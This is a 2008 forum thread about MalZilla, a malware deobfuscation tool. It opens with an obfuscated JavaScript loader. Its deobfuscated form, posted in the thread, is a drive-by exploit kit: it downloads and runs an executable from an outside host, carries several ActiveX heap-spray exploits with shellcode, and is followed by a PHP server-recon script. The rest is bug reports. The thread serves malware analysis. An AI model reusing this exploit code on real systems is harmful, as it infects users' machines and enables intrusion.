ffQefIm@eulHQhQqbosc5OychaRHhfCBaO1chaRHhfpM5TmH5pmaQXr@BR@M5SCahLYGBhQqbosc5O1@eulHQOQefIm@eulHQX4avIl2vg6cedaQua1chaRHhfpQeJpHPpa@fGHM5SCahLYGBhQqbnaGQaY@f61@eulHQX@GPXr@v6CMBO4C5RsHhJCQaOHe@pHeuRH6BO1@eulHQOQefI2HeLO@ffHVhaRHhfCMBOychaRHhfO6OtyahgCBeJe@f@HVeJr2f4m75b62BBb6OtyHegCQBBeeuhHBQ2ceuRbefBOMBBHBeJeHTBeXaI2HeLOHBG6C5pmaQXrHGHJqvbm2fIY7POQefdZMGHJzv66@eJCQBIY7PX@GPXr@v6CQaO4YuBHVhTx@f@HVhTx@ffHBvXYH5Ls@5JaVfJ1MBXRHhBb6OtyahgCBeOQefdZMGHJfeOQefumcQX49eXlCeaYHGHJzeIkc6ARceSR@eJCBaO1GvFO6OtWchDpMSupH5u2GPOQefGO6OtQ@f@HMeIkc6ARceSR@eJO6OtWchDpMSupH5u2GPOQefIY7PhQqbumcQX49eXlCeaY@f@HBehQqb@lGhpl@Q6VGBheaOtQaOtQqbBx@Bb4avLlGPSlaBhkqvbm2fpsc5dY@vWQePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBbYbpsc5dY@vWTM5J7aSp775BmGvpY@BI4@eblC5B7cfa1MhalaQkkegAYEujaYSWQBST1euGM6um766ey5gRQQuRc5uirsXSHYunZYfBbYbosc5OcahgrGPpm6akRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGtcahgrGPpmY6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGQc9uQ1YuSVu64Y5G1eBuWc5XGGYgml66RHegR19Xn4eugZsXIBMGtyahgCBeQl2vg6cede6vXYH5Ls@5JaM56Y@ealHefZBDTleuSMsDBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPI2HeLOGaG67vbmCGtyahgCM5al25blGP@1eufQG@S775BpHPX@GPXr@v6OYbnaGQaY@BI6HPI2HeLOc6aYced72Q242eSCahLYGBI6HPI2HeLOHB@1GQdm@eulHQhJqvbm2fF6@eam@eulHQ@1GQdm@eulHQX4avIl2vg6cedaQua42eSCahLYGBhJqvbm2fI2HeLOGaI6HPI2HeLOc6SY7hS775BpHP6He6I6HPI2HeLOc6aYced72QG42eSCahLYGBhJzv66@eJaVhaRHhfpQeJpHPpaHBS2H5RsHhJ2eue7euRHeuB1@eulHQ@1@eulHQf1@eulHQfyGQa2chaRHhfOYbosc5OQGPGRc5QeYeJr2f4m75b62BBbYbFRc56GaaRbe@2GeuRbe@fbBBGYGeuma@qaap@1@eulHQfQG@S775BpHPhJqhTxcPJmaaI@v@RMcfhJfhk7@f@HVhTxcPJmCBIY7PFYc5f1GvFxGPgOVhTxcPJmCGtZ2QB2GP61GvFxGPgpQeJpHPpa@aTHeuRBVhTxcPJmCB@M@PkOYbpma@h7ahgrGPpsY6SYc5oYc5@1GvFxGPgOevbmCPJ7auXBceB7aQb2GQPY@BBbevbmCPJ7auX4aPX7@BBQChb7Ch6aBPBba2tc75QO2vbmCPJ77uX4aPgxaPgeYhTxcPJmCGpsc5dY@vgTV5JlGPBxaP6BMG@lGhpl@Q6VGBhe7b@kqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtZaQXkaQReePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtZaQXkaQRpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkk6SRB6S1xeGjmMBgY@5aOXucOVfiseXmeQXSV5gG19XW466is5XW4YgR4eXQHeXIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4eGdBMGHJqvbm2f6l2vus@PkmaaRG2uLCshR4@uLO6OtyahgCQQIlaQPYGaRG2XRHeuRHsGHJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeROVeuCCBIVBvIbVeuCCBXR@5Bb6OtyahgCVhBrch@QG@osc5hQqbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhQqbI6HPIeYhBrchX4avIl2vg6cedaQua425S2H5BkaPu16BhQqb6m@eulHQSeeB6l2vus@Pkma6RG2XRHeuRH6BuGchS6c@JO6OtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGHJqPum2Bosc5OBGaRb6Q2GchaRHhflCGBOMBBQGPGRc5QOXQceYhBrchfQG@S775BpHPhQqbosc5OcaPS7aadZMGHJqPum2BBe6uhB@ag46uhBHBfBQvJl2vfQsD4rMGHJhvJl2vfQYf7a2uL2v@R4@peCsh7a2uL2v@R4@peCsh7a2uLmMGHJhvg6C@n6ceP6@5X4E5Js@vJpuPnx9ea7GPgxE5uecRbeGP6caPS7aB@lGhpl@Q6VGBheaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bosc5O1aPR2GaXYHvOME5gsG@61QvBmQ6I1cQIBMGtc75QO7bosc5OcaPS7aaJxahaaVfXYHvOM9hIbV5JC2eqC6pf1VvJa8RIbV5JC2eqs6pf1BPL72BdMXvBlHQx6GeJpBnT6Hhf7XQGYHDB1BBhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sXdBMGtyahgCQQS7Ceb7@PgeeueCshR4@uLCshhJqvbm2f6mH5BkaP@He@pHeuRHeuhJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPIe6eQxahgOYbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqhBrch@1GQdmc6SY7hS775BpHP6He6SCC5alaQPYH6gBMGtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGtyHegaVvbm2fBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@1GQdmHBG6C5pmaQXrHGtcHeLYaeJp@vXZ75B7aP6ZQaumcQJl@vO45R4l8nM7uaI4@eS6@PPHYuixEuTcuXGGsSWZ66p1EuSQVSAaeuGc9upGeG4m5gmlEXimVa2HahgsGeOTGhGYGaI475LmQfos@eTYGaIV@@R2HeB7C5uGCXIpQ56C7fv@e5bmahGCVebeGP@1BhT7CeR2GhQmQfos@eTYGaIc75TYcfv@e5bmahGCVebeGP@1QeuR@5IHVvb2GvJeYfFs@eSYcfv@e5bmahGCVebeGP@1Mhup@vgR@eaYc5IHVvb2GvJeYfpmavJmVa2WMeIkGPL77adBMG@kzhb7Ch6aBPBba2tQ7btBcP6MM5TlHhJlC5Bb7bpma@hkqvbm2fumcQ@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGWHeun1sS1lu6e49SWQBuWcuuGBeGoVu6RH6SR4uGTVYSp16gIBMGtyahgCQQS7Ceb7@PgeeueC6XRVeuTH6XhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sudBMGtyahgCQQIlaQPYGaRG2XRHeuRHsGtyahgCQ5alaQPYGaG6C5pmaQXrc6aYced72QD1sGtyahgCM5Rl2eS6c@JeeQIlaQPYG66H2eS6c@JOQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fSCC5ae6eQxahgOYbnaGQaY@BSCC5apQeJpHPpacBg@s5Rl2eS6c@J6M5Rl2efQs5Rl2ehJqvbm2fSCC5aes5Rl2eX4avIl2vg6cedaQua425S2H5BkaPu16BhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2BBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@425S2HBG6C5pmaQXrHGtyahgCM5Sm2v@ZQfGY@v6R@P@1MDhJqPum2BBeeuhB@aWHeXSZsGBOMBB4C5g7CB@ZVDLG2uTH6XhZMGtcHeLYaeJp@vXZ75B7aP6ZQa67aeaCQ@G2ceSkYv@1BvgpcGSl@QJeGhSeBeBlc5ulCeF7a6LRGePyaeamVa2WchDYHhpCBQkeYf!e5RKYcekYc5IHMhasH5S6@P@1MSClXWmk6uRHsXg4ugAeQGAluuGM6ums66QGYX1eQuRM5uA66XT15XgVEfv@s6umcQJl@vv@s5p62eJpYv723GDb7hJaGho6Hegk6vg2@BLyXRCmXPX7GPg6MG@2s6S7a@aYca2y7GgYHhpCM5p62eJeYfn6@PpacGW1euR7CG6YGQda@vPGeuR77fOyGQa2Hhu2HegeYfgY@PITeaokYPB2@edbM5Sm2vfZVfv@s6okY5Jl@vv@s6okYPB2@evZBBhJf2Ls@vLa@BJ6M@@kf2tJfQFaBfSYChLYH5S6M@tyahgCV5JC2e@TGPnCBSgmahQaVfJmcfa1BQJmQ6IW@eI@VfLRcfa1BPpmQ6I@GQIBMGtc75QO7bosc5OZ7vF6GaIZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXMYfhJqvbm2fnx7PBRGaXYHvOM9hp6cvJa8RIkGPL72Bnx7PB6MGtyahgCBeQl2vg6cedesDJVCDfTHeROVeuCCBSaGPa2HhuOMDJV7uR4YudbYbnaGQaY@BG6C5pmaQXrc6aYced72Q24eun16BG6C5pmaQXrHB@1BDTmMBXRHhfTHeLOYbG6C5pmaQXrGaTpGPSlGhRY@BG6C5pmaQXrGBhJqvbm2fG67vbmaaTpGPSlGhRY@BIVBvIbVeulHBXRHhBbYbosc5O1GQdmGaG67vbmCGtZ2QB2GP61GQdmc6aYced72Q2QeueseuRHeuRBVhBrchfQYhBrchhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2Bosc5OBGaRb6Q2MYuRb6QfbBBGYGeuma@q6Gp@1GQdmc6SY7hS775BpHP6He6RGauRHeuRH66G6C5pmaQXrc6aYced72QBbBeQl2vg6cedOYbFRc56yahgCBQ@HsGB26uR1eXhBHBfBM@tyahgCMvoxGQueYeJr2f4l@vBxaPYREhDYHhpaMvoxGQBbYbJxahaaVfpma@hr7vF6HeX47ff1aPR2HTpQ8BI43ff1aPR2HTTQ8BI4GP6He@nycPFxcPFY@6R@Qua1eugM6uoMeueBMG@lGhpl@Q6VGBhe7fBbYbosc5OZ7vF6He@TGPnCBSL7aQoY@T9mcQJl@v6Z7vF6GBhJf2tQChb7Ch6aBPBba2tQ7btB";var vibqt=13886,uwchr,pxhy,gyyqwo='',hgkmmtap=xlkxqsz=ruleddw=0;for(pxhy=14;pxhy>0;pxhy--){for(uwchr=Math.min(vibqt,1024);uwchr>0;uwchr--,vibqt--){eval('ruleddw|=(uaigei[lszxla.charC'+'odeAt(hgkmmtap++)-33])<<xlkxqsz;');if(xlkxqsz){gyyqwo+=eval('String.fromCha'+'rCode(41^ruleddw&255)');ruleddw>>=8;xlkxqsz-=2}else xlkxqsz=6;}}eval(gyyqwo);

 
Title: Re: MalZilla
Post by: MysteryFCM on September 01, 2008, 11:03:25 pm
Same here :( (confirmed on XP SP2 and SP3)
Title: Re: MalZilla
Post by: bobby on September 02, 2008, 04:04:47 am
Which option you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on partition, as this script require a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?
Title: Re: MalZilla
Post by: bobby on September 02, 2008, 04:05:56 am
Here is the script after deobfuscation:
Code: [Select]
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" &  tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}

if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location="exploits/x9.php?zenturi=1";}catch(e){}
}

var nop='90',noc='0C',scf='F';var shellco='%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2e7e%u7865%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D%u3633%u3935%u3433%u3838%u2630%u3D65';


if(!success){

var obj=null;

try{

obj=document.createElement("object");

obj.setAttribute("classid","clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F");

if(obj){

var mystring=unescape(shellco+"%u3731");

var hbs=0x100000,sss=hbs-(mystring.length*2+0x38);

var hb=(0x0c0c0c0c-hbs)/hbs;

var myvar=unescape("%u"+noc+noc+"%u"+noc+noc);

var ss=myvar;

while(ss.length*2<sss)ss+=ss;

ss=ss.substring(0,sss/2);

var m=new Array();

for(i=0;i<hb;i++)m[i]=ss+mystring;

z=Math.ceil(0x0c0c0c0c);

z=document.scripts[0].createControlRange().length;

}

}catch(e){}

}



if(!success){
obj=document.write('<iframe src="exploits/x12b.php?o=2&t=1220309190&i=1365934880" width=0 height=0></iframe>');
}



if(!success){

var repl=new Array("cl","-");

try{

obj=document.createElement("object");

obj.setAttribute(repl[0]+"assid",repl[0]+"sid:2F542A2E"+repl[1]+"EDC9-4BF7-8CB1-87C9919F7F93");

var mystring=unescape(shellco+'%u3331');

var myvar = unescape("%u"+noc+noc+"%u"+noc+noc);

var bblock = myvar;

var sspace = 20 + mystring.length;

while (bblock.length < sspace) bblock += bblock;

var fblock = bblock.substring(0,sspace);

var block = bblock.substring(0,bblock.length - sspace);

while (block.length + sspace < 0x40000) block = block + block + fblock;

var mem = new Array();

for (i=0; i<400; i++) mem[i]=block+mystring;

var buf = '';

while (buf.length < 32) buf = buf + unescape("%"+noc);

var m = '';

m = obj.Console;

obj.Console = buf;

obj.Console = m;

m = obj.Console;

obj.Console = buf;

obj.Console = m;

}catch(e){}

}



if(!success){
var target1=document.createElement("object");
target1.setAttribute("classid","clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277");
var target2=document.createElement("object");
target2.setAttribute("classid","clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
var mystring=unescape(shellco+'%u3031');
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigblock=myvar;
var slspace=20+mystring.length;
while(bigblock.length<slspace)bigblock+=bigblock;
var fillblock=bigblock.substring(0,slspace);
var block=bigblock.substring(0,bigblock.length-slspace);
while(block.length+slspace<0x40000)block=block+block+fillblock;
var memory=new Array();
for(x=0;x<800;x++)memory[x]=block+mystring;
buffer="\x0a";
add = buffer+buffer+buffer+buffer;
while(buffer.length<5000)buffer+=add;
try{target1.server=buffer;target1.initialize();target1.send()}catch(e){}
try{target2.server=buffer;target2.receive();}catch(e){}
}

if(!success){

var repl=new Array("cl","-");

try{

winzip=document.createElement("object");

winzip.setAttribute(repl[0]+"assid",repl[0]+"sid:A09AE68F"+repl[1]+"B14D-43ED-B713-BA413F034904");

var mystring=unescape(shellco+'%u2038');

var hstoaddr=0x0c0c0c0c;

var hbsize=0x400000;

var spslsize=hbsize-(mystring.length*2+0x38);

var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);

var bigb=myvar;

while(bigb.length*2<spslsize)bigb+=bigb;

bigb=bigb.substring(0,spslsize/2);

hblocks=(hstoaddr-0x400000)/hbsize;

var memory=new Array();

for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;

var test='';

for(i=1;i<231;i++)test+='A';

test+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";

try{winzip.CreateNewFolderFromName(test)}catch(e){}

}catch(e){}

}



if(!success){
var repl=new Array("ti","bj");
try{
var test=eval("new Ac"+repl[0]+"veXO"+repl[1]+"ect('QuickTime.QuickTime')");
var mystring=unescape(shellco+'%u2037');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
hblocks=(hstoaddr-0x400000)/hbsize;
bigb=bigb.substring(0,spslsize/2);
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="src" value="exploits/x7b.php"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');}
catch(e){}
}

if(!success){
try{
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E");
var hstoaddr=0x05050505;
var mystring=unescape(shellco+'%u2033');
var hbsize=0x400000;
var plsize=mystring.length*2;
var spslsize=hbsize-(plsize+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var spsl=myvar;
while(spsl.length*2<spslsize)spsl+=spsl;
var spsl=spsl.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(i=0;i<hblocks;i++)memory[i]=spsl+mystring;
var ssrt=' method="';
for(i=0;i<10437;i++)ssrt+='&#x0505;';
document.write('<html xmlns:v="urn:schemas-microsoft-com:vml"><object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\\:*{behavior:url(#VMLRender);}</style><v:rect style="width:120pt;height:80pt" fillcolor="red"><v:fill'+ssrt+'"></v:rect></v:fill>');
}catch(e){}
}

if(!success){
var repl=new Array("eb","ie","ol","co","et","li");
try{
var wvfi="W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.1";
var wvfio=new ActiveXObject(wvfi);
var mystring='%u'+nop+nop+shellco+'%u2032';
while(mystring.length<3072)mystring+="%u"+noc+noc;
mystring=unescape(mystring);
var myvar=unescape("%u"+noc+noc);
var bigb=myvar;
while(bigb.length<=0x100000)bigb+=bigb;
var memory=new Array();
for(var i=0;i<120;i++)memory[i]=bigb.substring(0,0x100000-mystring.length)+mystring;
for(var i=0;i<1024;i++){
var wvfio=new ActiveXObject(wvfi);
eval("try{wvfio.s"+repl[4]+"S"+repl[5]+"ce(0x7ffffffe,0,0,202116108);}catch(e){}");
var wvfio=new ActiveXObject(wvfi);
}
}catch(e){}
}
Title: Re: MalZilla
Post by: MysteryFCM on September 02, 2008, 05:01:30 am
I've got it set to Override :)
Title: Re: MalZilla
Post by: bobby on September 02, 2008, 03:21:00 pm
Please use "Leave as is" as long as it give results. Use the other two options just in case the "Leave as is" does not work.
Title: Re: MalZilla
Post by: JohnC on September 02, 2008, 06:07:01 pm
bobby what are your pc specs and how long did it need to run for? This takes a while... and if you go to other windows and then back to malzilla's window it gives the access violation.
Title: Re: MalZilla
Post by: bobby on September 02, 2008, 06:51:49 pm
I use 2GHz AMD Athlon XP with 1GB RAM. Pretty old configuration for today's standards.
In your example, it creates some 22.000 temp files in eval_temp folder (every time eval() is called, a file is created, and it contains the arguments of eval() function). After that, Malzilla will eliminate duplicates between temp files, so it will remain less than 10 files after that (usually 3-5 files).
Most of the temp files are just a couple of bytes long (<100 bytes), but every file will occupy one whole cluster (usually 4kb), so you need 80mb free space on partition for the temp files.
To deobfuscate this script, my PC needs some 2-3 minutes (no anti-virus app is running, or some other heavy-duty service). Partition is NTFS, not compressed, file indexing is turned off.

I will try to reproduce the bug you got.

btw. are you running more than one instance of Malzilla at once? Both working on deobfuscation at the same time?
Title: Re: MalZilla
Post by: tjs on September 03, 2008, 05:29:35 am
Another odd bug with v1.0. Right click-exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.

Malzilla
-------
(X)
[ok]

TJS
Title: Re: MalZilla
Post by: tjs on September 03, 2008, 05:30:32 am
Actually, I don't know what I did-- but malzilla refuses to exit altogether! :P Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer) :)
Title: Re: MalZilla
Post by: bobby on September 03, 2008, 03:52:24 pm
I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.
Title: Re: MalZilla
Post by: JohnC on September 03, 2008, 04:00:32 pm
On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.

http://www.google.co.uk/

Also, if you click Run Script on decoders tab when there is no script, it will say script compiled, but the run script and debug button will turn grey like it is busy. So you cannot use it, until you close malzilla and re-open it.
Title: Re: MalZilla
Post by: bobby on September 03, 2008, 05:05:30 pm
I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
Only remaining problem is if the decoding get stuck, I can't do anything like Cancel button.
Title: Re: MalZilla
Post by: bobby on September 03, 2008, 05:21:50 pm
Please download this build from here:
http://malzilla.sourceforge.net/builds/
Title: Re: MalZilla
Post by: Orac on September 03, 2008, 06:24:45 pm
Just downloaded the latest one, which appears may have a ftp problem. I was unable to reterive the script from this link, ftp://216.12.192.109/ids.txt

The script at the link was then reterived using the first malzilla version incorporating ftp.
Title: Re: MalZilla
Post by: bobby on September 03, 2008, 06:28:43 pm
Works fine here. Can you test with WGET or with older version of Malzilla again?
Maybe is a temporary server glitch or something like that.
Title: Re: MalZilla
Post by: MysteryFCM on September 03, 2008, 06:34:31 pm
Prolly just a server glitch ..... script was snagged without issue here :)

Code: [Select]
<?php
function ConvertBytes($number)
{
        
$len strlen($number);
        if(
$len 4)
        {
                return 
sprintf("%d b"$number);
        }
        if(
$len >= && $len <=6)
        {
                return 
sprintf("%0.2f Kb"$number/1024);
        }
        if(
$len >= && $len <=9)
        {
                return 
sprintf("%0.2f Mb"$number/1024/1024);
        }
   
        return 
sprintf("%0.2f Gb"$number/1024/1024/1024);
                           
}

echo 
"Osirys<br>";
$un = @php_uname();
$up system(uptime);
$id1 system(id);
$pwd1 = @getcwd();
$sof1 getenv("SERVER_SOFTWARE");
$php1 phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 gethostbyname($SERVER_ADDR);
$free1diskfreespace($pwd1);
$free ConvertBytes(diskfreespace($pwd1));
if (!
$free) {$free 0;}
$all1disk_total_space($pwd1);
$all ConvertBytes(disk_total_space($pwd1));
if (!
$all) {$all 0;}
$used ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo 
"Osirys was here ..<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"uptime: $up<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"server-name: $name1<br>";
echo 
"server-ip: $ip1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all<br>";
exit;
Title: Re: MalZilla
Post by: Orac on September 03, 2008, 06:44:01 pm
Just tried grabbing it with the new version, this time it worked fine.

Must have been a server burp.

Title: Re: MalZilla
Post by: JohnC on October 08, 2008, 08:15:40 pm
